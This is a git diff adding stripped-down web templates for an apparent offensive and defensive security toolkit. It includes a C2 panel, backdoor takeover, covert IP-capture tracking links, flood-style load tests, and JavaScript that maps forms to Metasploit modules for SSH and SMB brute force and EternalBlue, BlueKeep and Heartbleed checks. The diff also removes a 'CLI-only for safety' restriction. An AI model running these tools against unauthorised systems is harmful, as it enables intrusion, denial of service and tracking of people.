+            
Scrub Image Metadata

+            
Remove EXIF, GPS, and other metadata from image files (JPEG, PNG, TIFF).

+            

+                
+            

+            
+            

+        

+        

+            
Scrub PDF Metadata

+            
Remove author, creation date, and other metadata from PDF files.

+            

+                
+            

+            
+            

+        

+    

+

+
+

+
+
+{% endblock %}
diff --git a/web/templates/api_fuzzer.html b/web/templates/api_fuzzer.html
new file mode 100644
index 0000000..10ffc09
--- /dev/null
+++ b/web/templates/api_fuzzer.html
@@ -0,0 +1,595 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — API Fuzzer{% endblock %}
+{% block content %}
+

+    
API Fuzzer

+    

+        Discover endpoints, fuzz parameters, and detect API vulnerabilities.
+    

+

+
+
+

+    
+    
+    
+

+
+
+

+
+    
+    

+        
Discover Endpoints

+        

+            

+                
+                
+            

+        

+        

+            
+        

+        

+    

+
+    
+    

+        
OpenAPI / Swagger Parser

+        

+            

+                
+                
+            

+        

+        

+            
+        

+        

+    

+
+    
+    

+        
Discovered Endpoints

+        

+            
+            
+        

+        
+            
+                
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
PathStatusMethodsContent Type
No endpoints discovered yet. Run discovery or parse an OpenAPI spec.

+    

+

+
+
+

+
+    
+    

+        
Fuzz Target

+        

+            

+                
+                
+            

+            

+                
+                
+            

+        

+        

+            
+            
+        

+        

+            

+                
+                
+            

+        

+        

+            
+            
+        

+        

+        
+    

+
+    
+    

+        
Authentication

+        

+            

+                
+                
+            

+            
+            
+        

+    

+
+    
+    

+        
GraphQL Testing

+        

+            

+                
+                
+            

+        

+        

+            
+            
+        

+        

+        
+    

+

+
+
+

+
+    
+    

+        
Findings

+        

+            
+            
+        

+        
+            
+                
+                    
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
ParameterPayloadTypeSeverityStatus
No findings yet. Run the fuzzer first.

+    

+
+    
+    

+        
Auth Bypass Results

+        

+            
+        

+        

+    

+
+    
+    

+        
Rate Limit Test

+        

+            

+                
+                
+            

+            

+                
+                
+            

+        

+        

+            
+        

+        

+    

+
+    
+    

+        
Response Analysis

+        

+            

+                
+                
+            

+        

+        

+            
+        

+        

+    

+

+
+
+{% endblock %}
diff --git a/web/templates/base.html b/web/templates/base.html
index 74fd2f9..ad373b7 100644
--- a/web/templates/base.html
+++ b/web/templates/base.html
@@ -40,12 +40,32 @@
                     
  • └ Linux
    • 
                     
  • └ Windows
    • 
                     
  • └ Threat Monitor
    • 
+                    
  • └ Threat Intel
    • 
+                    
  • └ Log Correlator
    • 
                     
  • Offense
    • 
+                    
  • └ Load Test
    • 
+                    
  • └ Gone Fishing
    • 
+                    
  • └ Hack Hijack
    • 
+                    
  • └ Web Scanner
    • 
+                    
  • └ C2 Framework
    • 
+                    
  • └ WiFi Audit
    • 
+                    
  • └ API Fuzzer
    • 
+                    
  • └ Cloud Scan
    • 
                     
  • Counter
    • 
+                    
  • └ Steganography
    • 
+                    
  • └ Anti-Forensics
    • 
                     
  • Analyze
    • 
                     
  • └ Hash Toolkit
    • 
                     
  • └ LLM Trainer
    • 
+                    
  • └ Password Toolkit
    • 
+                    
  • └ Net Mapper
    • 
+                    
  • └ Reports
    • 
+                    
  • └ BLE Scanner
    • 
+                    
  • └ Forensics
    • 
+                    
  • └ RFID/NFC
    • 
+                    
  • └ Malware Sandbox
    • 
                     
  • OSINT
    • 
+                    
  • └ IP Capture
    • 
                     
  • Simulate
    • 
                     
  • └ Legendary Creator
    • 
                 
@@ -69,6 +89,8 @@
                     
  • UPnP
    • 
                     
  • WireGuard
    • 
                     
  • MSF Console
    • 
+                    
  • DNS Server
    • 
+                    
  • └ Nameserver
    • 
                     
  • Settings
    • 
                     
  • └ LLM Config
    • 
                     
  • └ Dependencies
    • 
diff --git a/web/templates/ble_scanner.html b/web/templates/ble_scanner.html
new file mode 100644
index 0000000..3f49b01
--- /dev/null
+++ b/web/templates/ble_scanner.html
@@ -0,0 +1,515 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — BLE Scanner{% endblock %}
+{% block content %}
+
    
+    
    BLE Scanner
    
+    
    
+        Bluetooth Low Energy device discovery, service enumeration, and characteristic inspection.
+    
    
+
    
+
+
+
    
+    
+    
+
    
+
+
+
    
+
+    
+    
    
+        
    BLE Scan
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+            
    
+        
    
+        
    
+            
+            Checking bleak availability...
+        
    
+        
    
+    
    
+
+    
+    
    
+        
    Discovered Devices
    
+        
    
+            
+            
+            
+        
    
+        
+            
+                
+                    
+                    
+                    
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
    AddressNameRSSITypeManufacturerServices
    No devices found. Run a scan to discover BLE devices.
    
+    
    
+
+    
+    
    
+        
    Saved Scans
    
+        
    
+            
+        
    
+        
    
+            
    No saved scans.
    
+        
    
+    
    
+
    
+
+
+
    
+
+    
+    
    
+        
    Device Connection
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+            
    
+            
    
+                
+            
    
+        
    
+        
    
+    
    
+
+    
+    
    
+        
    Services & Characteristics
    
+        
    
+            
    Connect to a device to view its GATT services.
    
+        
    
+    
    
+
+    
+    
    
+        
    Proximity Tracking
    
+        
    
+            
    
+                
+            
    
+            
    
+                
+            
    
+        
    
+        
    
+            
    
+                
    Estimated Distance
    
+                
    -- m
    
+                
    RSSI: --
    
+            
    
+            
    
+                
    RSSI History
    
+                
    
+                    
+                
    
+            
    
+        
    
+    
    
+
+    
+    
    
+        
    Tracking History
    
+        
    
+            
+            
+        
    
+        
+            
+                
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
    TimestampAddressRSSIDistance (m)
    No tracking history.
    
+    
    
+
    
+
+
+{% endblock %}
diff --git a/web/templates/c2_framework.html b/web/templates/c2_framework.html
new file mode 100644
index 0000000..1bac5f7
--- /dev/null
+++ b/web/templates/c2_framework.html
@@ -0,0 +1,260 @@
+{% extends "base.html" %}
+{% block title %}C2 Framework — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    C2 Framework
    
+    
    Command & Control — listeners, agents, task queue
    
+
    
+
+
    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    
+            
    Listeners
    
+            
    
+                
+                
+                
+            
    
+            
    
+        
    
+        
    
+            
    Active Agents
    
+            
    
+        
    
+    
    
+    
    
+        
    Recent Tasks
    
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/cloud_scan.html b/web/templates/cloud_scan.html
new file mode 100644
index 0000000..bd67e74
--- /dev/null
+++ b/web/templates/cloud_scan.html
@@ -0,0 +1,275 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — Cloud Security{% endblock %}
+
+{% block content %}
+
    
+    
    Cloud Security Scanner
    
+    
    
+        Discover exposed cloud storage buckets, misconfigured services, and enumerate subdomains.
+    
    
+
    
+
+
+
    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Bucket Discovery
    
+    
    
+        Search for publicly accessible cloud storage buckets by keyword or company name.
+    
    
+    
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        Providers:
+        
+        
+        
+    
    
+    
    
+        
+        
+    
    
+    
+        
+        
+            
+        
+    
    Bucket NameProviderStatusPublicListable
    Enter a keyword and click Scan to discover buckets.
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Exposed Services Scanner
    
+    
    
+        Probe a target URL for commonly exposed cloud services, admin panels, and metadata endpoints.
+    
    
+    
    
+        
+        
+    
    
+    
+        
+        
+            
+        
+    
    PathServiceStatusSensitive
    Enter a target URL and scan for exposed services.
    
+
    
+
+
    
+    
    Cloud Metadata SSRF Check
    
+    
    
+        Test for accessible cloud metadata endpoints (IMDS) that may be reachable via SSRF.
+    
    
+    
    
+        
+        
+    
    
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Subdomain Enumeration
    
+    
    
+        Enumerate subdomains for a target domain and identify cloud provider hints.
+    
    
+    
    
+        
+        
+    
    
+    
+    
+        
+        
+            
+        
+    
    SubdomainIP AddressCloud Provider
    Enter a domain and click Enumerate to discover subdomains.
    
+
    
+
+
    
+
+
+{% endblock %}
diff --git a/web/templates/dns_nameserver.html b/web/templates/dns_nameserver.html
new file mode 100644
index 0000000..16a9589
--- /dev/null
+++ b/web/templates/dns_nameserver.html
@@ -0,0 +1,1556 @@
+{% extends "base.html" %}
+{% block title %}Nameserver — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    Nameserver
    
+    
    Recursive resolver, query analytics, cache management, blocklist, benchmarking
    
+
    
+
+
+
    
+    
    
+        
    
+            
    autarch-dns
    
+            
    Checking...
    
+        
    
+        
    
+            
+            
+            
+        
    
+    
    
+    
+
    
+
+
+
    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    DNS Query Tester
    
+        
    
+            Test resolution against the running nameserver or system resolver.
+        
    
+        
    
+            
    
+                
+                
+            
    
+            
+            
+            
+        
    
+    
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/dns_service.html b/web/templates/dns_service.html
new file mode 100644
index 0000000..49f3752
--- /dev/null
+++ b/web/templates/dns_service.html
@@ -0,0 +1,1607 @@
+{% extends "base.html" %}
+{% block title %}DNS Server — AUTARCH{% endblock %}
+{% block content %}
+
    DNS Server
    
+
    
+    Authoritative DNS & nameserver with zone management, DNSSEC, import/export, and mail record automation.
+
    
+
+
+
    
+    
    Status: Checking...
    
+    
+    
+    
+    
    
+
    
+
+
+
    
+    
+    
+    
+    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    
+            
    Create Zone
    
+            
+            
+            
+            
    
+
+            
    
+            
    Clone Zone
    
+            
    Duplicate an existing zone to a new domain name.
    
+            
+            
+            
+            
+            
+            
    
+
+            
    
+            
    Quick Mail Setup
    
+            
    Auto-create MX, SPF, DKIM, DMARC records for a zone.
    
+            
+            
+            
+            
+            
+            
+            
+            
    
+        
    
+
+        
    
+            
    
+                
    Zones
    
+                
+            
    
+            
    Loading...
    
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/forensics.html b/web/templates/forensics.html
new file mode 100644
index 0000000..1d4dc20
--- /dev/null
+++ b/web/templates/forensics.html
@@ -0,0 +1,562 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — Forensics Toolkit{% endblock %}
+{% block content %}
+
    
+    
    Forensics Toolkit
    
+    
    
+        File hashing, data carving, timeline analysis, and evidence chain of custody.
+    
    
+
    
+
+
+
    
+    
+    
+    
+    
+
    
+
+
+
    
+
+    
+    
    
+        
    Hash File
    
+        
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+        
    
+        
+    
    
+
+    
+    
    
+        
    Verify Hash
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+        
    
+        
    
+    
    
+
+    
+    
    
+        
    Disk Image Creator
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+        
    
+        
    
+        
+    
    
+
    
+
+
+
    
+
+    
+    
    
+        
    File Carving
    
+        
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
    
+                
+                
    
+                    
+                    
+                    
+                    
+                    
+                    
+                    
+                    
+                
    
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+        
    
+        
    
+    
    
+
+    
+    
    
+        
    Carved Files
    
+        
    
+            
+            
+        
    
+        
+            
+                
+                    
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
    NameTypeOffsetSizeMD5
    No carved files. Run file carving first.
    
+    
    
+
    
+
+
+
    
+
+    
+    
    
+        
    Timeline Builder
    
+        
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+        
    
+        
    
+    
    
+
+    
+    
    
+        
    Events
    
+        
    
+            
+            
+            
+            
+        
    
+        
+            
+                
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
    TimestampTypeFileSize
    No timeline data. Build a timeline from a directory.
    
+    
    
+
    
+
+
+
    
+
+    
+    
    
+        
    Evidence Files
    
+        
    
+            
+        
    
+        
    
+            
    No evidence files registered.
    
+        
    
+    
    
+
+    
+    
    
+        
    Carved Files
    
+        
    
+            
    No carved files. Use the Carve tab to extract files.
    
+        
    
+    
    
+
+    
+    
    
+        
    Chain of Custody Log
    
+        
    
+            
+            
+        
    
+        
+            
+                
+                    
+                    
+                    
+                    
+                    
+                
+            
+            
+                
+            
+        
    TimestampActionTargetDetailsHash
    No chain of custody entries.
    
+    
    
+
    
+
+
+{% endblock %}
diff --git a/web/templates/hack_hijack.html b/web/templates/hack_hijack.html
new file mode 100644
index 0000000..a3848c2
--- /dev/null
+++ b/web/templates/hack_hijack.html
@@ -0,0 +1,391 @@
+{% extends "base.html" %}
+{% block title %}Hack Hijack — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    Hack Hijack
    
+    
    Scan for existing compromises and take over backdoors
    
+
    
+
+
    
+    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    Target Scan
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+        
+        
+        
+    
    
+
+    
    
+        
    What This Scans For
    
+        
    
+            
    EternalBlue
    DoublePulsar SMB implant, MS17-010 vulnerability
    
+            
    RAT / C2
    Meterpreter, Cobalt Strike, njRAT, DarkComet, Quasar, AsyncRAT, Gh0st, Poison Ivy
    
+            
    Shell Backdoors
    Netcat listeners, bind shells, telnet backdoors, rogue SSH
    
+            
    Web Shells
    PHP/ASP/JSP shells on HTTP services
    
+            
    Proxies
    SOCKS, HTTP proxies, tunnels used as pivot points
    
+            
    Miners
    Cryptocurrency mining stratum connections
    
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/ipcapture.html b/web/templates/ipcapture.html
new file mode 100644
index 0000000..75f5ee8
--- /dev/null
+++ b/web/templates/ipcapture.html
@@ -0,0 +1,233 @@
+{% extends "base.html" %}
+{% block title %}IP Capture — AUTARCH{% endblock %}
+{% block content %}
+
    IP Capture & Redirect
    
+
    
+    Create stealthy tracking links that capture visitor IP + metadata, then redirect to a legitimate site.
+
    
+
+
+
    
+    
+    
+
    
+
+
+
    
+    
    
+        
+        
    
+            
    Create Capture Link
    
+            
+            
+
+            
+            
+
+            
+            
+
+            
+
+            
+            
+        
    
+
+        
+        
    
+            
    
+                
    Active Links
    
+                
+            
    
+            
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/loadtest.html b/web/templates/loadtest.html
new file mode 100644
index 0000000..a7c7261
--- /dev/null
+++ b/web/templates/loadtest.html
@@ -0,0 +1,457 @@
+{% extends "base.html" %}
+{% block title %}Load Test - AUTARCH{% endblock %}
+
+{% block content %}
+
    
+    
    Load Testing
    
+
    
+
+
+
    
+    
    Test Configuration
    
+    
    
+        
+        
+        
+        
+        
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+            
+        
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+        
    
+        
    Slowloris holds connections open with partial HTTP headers, exhausting the target's connection pool. Each worker manages ~50 sockets.
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    Rapid TCP connect/disconnect to exhaust server resources. Set payload > 0 to send random data per connection.
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    Requires administrator/root privileges for raw sockets. Falls back to TCP connect flood without admin.
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    Sends UDP packets at maximum rate. Effective against UDP services (DNS, NTP, etc.).
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+        
    
+    
    
+
+    
+    
    
+        
+        
+        
+        
+    
    
+
    
+
+
+
+
+
+
    
+    
    Quick Presets
    
+    
    
+        
+        
+        
+        
+        
+        
+    
    
+
    
+
+
+{% endblock %}
diff --git a/web/templates/log_correlator.html b/web/templates/log_correlator.html
new file mode 100644
index 0000000..3be1a19
--- /dev/null
+++ b/web/templates/log_correlator.html
@@ -0,0 +1,473 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — Log Correlator{% endblock %}
+
+{% block content %}
+
    
+    
    Log Correlator
    
+    
    
+        Ingest, correlate, and alert on security events from multiple log sources.
+    
    
+
    
+
+
+
    
+    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Ingest from File
    
+    
    
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    Paste Log Data
    
+    
    
+        
+        
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+    
    Sources
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    SourceTypeEntriesLast Ingested
    No log sources ingested yet.
    
+
    
+
+
    
+    
    Search Logs
    
+    
    
+        
+        
+    
    
+    
+    
+        
+        
+            
+        
+    
    TimestampSourceLog Entry
    Enter a query and click Search.
    
+
    
+
+
    
+    
    
+        
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Security Alerts
    
+    
    
+        Severity:
+        
+        
+        
+        
+        
+        
+    
    
+    
+        
+        
+            
+        
+    
    TimestampRuleSeveritySourceLog Entry
    No alerts triggered yet.
    
+    
    
+        
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Detection Rules
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    IDNamePatternSeverityTypeAction
    No rules loaded.
    
+
    
+
+
    
+    
    Add Custom Rule
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Overview
    
+    
    
+        
    
+            
    Total Logs
    
+            
    --
    
+        
    
+        
    
+            
    Total Alerts
    
+            
    --
    
+        
    
+        
    
+            
    Sources
    
+            
    --
    
+        
    
+        
    
+            
    Active Rules
    
+            
    --
    
+        
    
+    
    
+    
    
+        
+    
    
+
    
+
+
    
+    
    Alerts by Severity
    
+    
+        
+            
+            
+            
+            
+        
+    
    Critical--
    High--
    Medium--
    Low--
    
+
    
+
+
    
+    
    Top Triggered Rules
    
+    
+        
+        
+            
+        
+    
    RuleCountLast Triggered
    No data yet.
    
+
    
+
+
    
+    
    Timeline (Hourly Alert Counts)
    
+    
    
+        
    
+        
    
+        
    No timeline data yet. Ingest logs and trigger rules to populate.
    
+    
    
+
    
+
+
    
+
+
+{% endblock %}
diff --git a/web/templates/malware_sandbox.html b/web/templates/malware_sandbox.html
new file mode 100644
index 0000000..bf2b0c6
--- /dev/null
+++ b/web/templates/malware_sandbox.html
@@ -0,0 +1,408 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — Malware Sandbox{% endblock %}
+
+{% block content %}
+
    
+    
    Malware Sandbox
    
+    
    
+        Submit, analyze, and report on suspicious files using static and dynamic analysis.
+    
    
+
    
+
+
+
    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Submit Sample
    
+    
    
+        Upload a file or specify a path on the server to submit for analysis.
+    
    
+
+    
    
+        
    
+            
+            
+        
    
+    
    
+    
    -- OR --
    
+    
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+    
    Submitted Samples
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    NameSizeSHA256SubmittedStatus
    No samples submitted yet.
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Select Sample
    
+    
    
+        
+        
+    
    
+
    
+
+
    
+    
    Static Analysis
    
+    
    
+        Inspect file headers, strings, imports, and calculate risk score without execution.
+    
    
+    
    
+        
+    
    
+
+    
+    
+
    
+
+
    
+    
    Dynamic Analysis
    
+    
    
+        Execute sample in an isolated Docker container and monitor behavior.
+    
    
+    
    
+        
+        
+    
    
+
+    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Analysis Reports
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    SampleRisk LevelDateAction
    No reports generated yet.
    
+
    
+
+
    
+    
    Generate Report
    
+    
    
+        
+        
+    
    
+
    
+
+
+
+
    
+
+
+{% endblock %}
diff --git a/web/templates/net_mapper.html b/web/templates/net_mapper.html
new file mode 100644
index 0000000..b59deed
--- /dev/null
+++ b/web/templates/net_mapper.html
@@ -0,0 +1,264 @@
+{% extends "base.html" %}
+{% block title %}Net Mapper — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    Network Topology Mapper
    
+    
    Host discovery, service enumeration, topology visualization
    
+
    
+
+
    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    Host Discovery
    
+        
    
+            
    
+                
+                
+            
    
+            
+            
+        
    
+        
    
+    
    
+
+    
    
+        
    Run a discovery scan to find hosts
    
+        
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/offense.html b/web/templates/offense.html
index 83db57a..b06d5eb 100644
--- a/web/templates/offense.html
+++ b/web/templates/offense.html
@@ -6,14 +6,52 @@
     
    Offense
    
 
 
-
+
 
    
-    
    Metasploit Status
    
-    
    
-        Checking...
+    
    Metasploit Server
    
+    
    
+        
    
+            Checking...
+        
    
+        
    
+        
    
+        
+        
+        
+        
+    
    
+
+    
+    
-    
    
-    
    Module execution is CLI-only for safety. The web UI provides search, browsing, and status.
    
 
    
 
 
@@ -28,55 +66,6 @@
     
    
 
 
-
-
    
-    
    Module Browser
    
-    
    
-        
-        
-        
-        
-    
    
-    
-    
-    
-    
-    
    
-        
    Click a tab to browse modules.
    
-    
    
-    
    
-    
    
-    
    
-
    
-
-
-
    
-    
    Active Sessions
    
-    
    
-        
-    
    
-    
    
-        
    Click "Refresh" to check for active sessions.
    
-    
    
-
    
-
-{% if modules %}
-
    
-    
    Offense Modules
    
-    
      
-    {% for name, info in modules.items() %}
-        
    • 
-            
      
-                
      {{ name }}
      
-                
      {{ info.description }}
      
-            
      
-            
      v{{ info.version }}
      
-        
      • 
-    {% endfor %}
-    
    
-
    
-{% endif %}
-
 
 
    
     
    Run Module
    
@@ -84,6 +73,10 @@
         
         
         
+        
+        
+        
+        
         
     
    
 
@@ -105,6 +98,7 @@
         
         
    
             
+            
             
         
    
         
         
         
    
-            
-            
+            
+            
+            
+            
         
    
     
 
@@ -153,11 +149,119 @@
             
         
         
    
-            
-            
+            
+            
+            
+            
         
    
     
 
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+            
+            
+            
+        
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+            
+            
+            
+        
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+            
+            
+            
+        
    
+    
    
+
+    
+    
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+        
    
+            
+        
    
+        
    Exploits run as background jobs. Check Active Sessions for shells.
    
+    
    
+
     
     
    
         
    
@@ -183,6 +287,57 @@
     
    
 
    
 
+
+
    
+    
    Module Browser
    
+    
    
+        
+        
+        
+        
+    
    
+    
+    
+    
+    
+    
    
+        
    Click a tab to browse modules.
    
+    
    
+    
    
+    
    
+    
    
+
    
+
+
+
    
+    
    Active Sessions & Jobs
    
+    
    
+        
+        
+    
    
+    
    
+        
    Click "Refresh" to check for active sessions and jobs.
    
+    
    
+    
    
+
    
+
+{% if modules %}
+
    
+    
    Offense Modules
    
+    
      
+    {% for name, info in modules.items() %}
+        
    • 
+            
      
+                
      {{ name }}
      
+                
      {{ info.description }}
      
+            
      
+            
      v{{ info.version }}
      
+        
      • 
+    {% endfor %}
+    
    
+
    
+{% endif %}
+
 
 
    
     
    Agent Hal — Autonomous Mode
    
@@ -202,18 +357,169 @@ let _currentRunId = null;
 // Check MSF status on page load
 document.addEventListener('DOMContentLoaded', function() { checkMSFStatus(); });
 
+/* ── Featured Module Definitions ───────────────────────────────── */
 const _FEATURED = {
-    'ssh':        {path: 'auxiliary/scanner/ssh/ssh_version',  opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, THREADS: parseInt(v('ssh-threads')) || 10})},
-    'ssh-brute':  {path: 'auxiliary/scanner/ssh/ssh_login',    opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, USERNAME: v('ssh-username'), PASSWORD: v('ssh-password')})},
-    'tcp-scan':   {path: 'auxiliary/scanner/portscan/tcp',     opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
-    'syn-scan':   {path: 'auxiliary/scanner/portscan/syn',     opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
-    'smb-version':{path: 'auxiliary/scanner/smb/smb_version',  opts: () => ({RHOSTS: v('os-rhosts')})},
-    'http-header':{path: 'auxiliary/scanner/http/http_header', opts: () => ({RHOSTS: v('os-rhosts')})},
-    'custom':     {path: null, opts: () => {try{return JSON.parse(v('custom-options') || '{}')}catch(e){return {}}}},
+    // SSH
+    'ssh':           {path: 'auxiliary/scanner/ssh/ssh_version',  opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, THREADS: parseInt(v('ssh-threads')) || 10})},
+    'ssh-enum':      {path: 'auxiliary/scanner/ssh/ssh_enumusers', opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, THREADS: parseInt(v('ssh-threads')) || 10})},
+    'ssh-brute':     {path: 'auxiliary/scanner/ssh/ssh_login',    opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, USERNAME: v('ssh-username'), PASSWORD: v('ssh-password')})},
+    // Port Scan
+    'tcp-scan':      {path: 'auxiliary/scanner/portscan/tcp',     opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
+    'syn-scan':      {path: 'auxiliary/scanner/portscan/syn',     opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
+    'ack-scan':      {path: 'auxiliary/scanner/portscan/ack',     opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
+    'udp-scan':      {path: 'auxiliary/scanner/discovery/udp_sweep', opts: () => ({RHOSTS: v('ps-rhosts'), THREADS: parseInt(v('ps-threads')) || 10})},
+    // OS Detect
+    'smb-version':   {path: 'auxiliary/scanner/smb/smb_version',  opts: () => ({RHOSTS: v('os-rhosts')})},
+    'http-header':   {path: 'auxiliary/scanner/http/http_header', opts: () => ({RHOSTS: v('os-rhosts')})},
+    'ftp-version':   {path: 'auxiliary/scanner/ftp/ftp_version',  opts: () => ({RHOSTS: v('os-rhosts')})},
+    'telnet-version':{path: 'auxiliary/scanner/telnet/telnet_version', opts: () => ({RHOSTS: v('os-rhosts')})},
+    // Vuln Scan
+    'eternalblue-check': {path: 'auxiliary/scanner/smb/smb_ms17_010', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
+    'bluekeep-check':    {path: 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
+    'ssl-heartbleed':    {path: 'auxiliary/scanner/ssl/openssl_heartbleed', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
+    'shellshock-check':  {path: 'auxiliary/scanner/http/apache_mod_cgi_bash_env', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
+    // SMB
+    'smb-enum-shares': {path: 'auxiliary/scanner/smb/smb_enumshares', opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
+    'smb-enum-users':  {path: 'auxiliary/scanner/smb/smb_enumusers',  opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
+    'smb-login':       {path: 'auxiliary/scanner/smb/smb_login',      opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
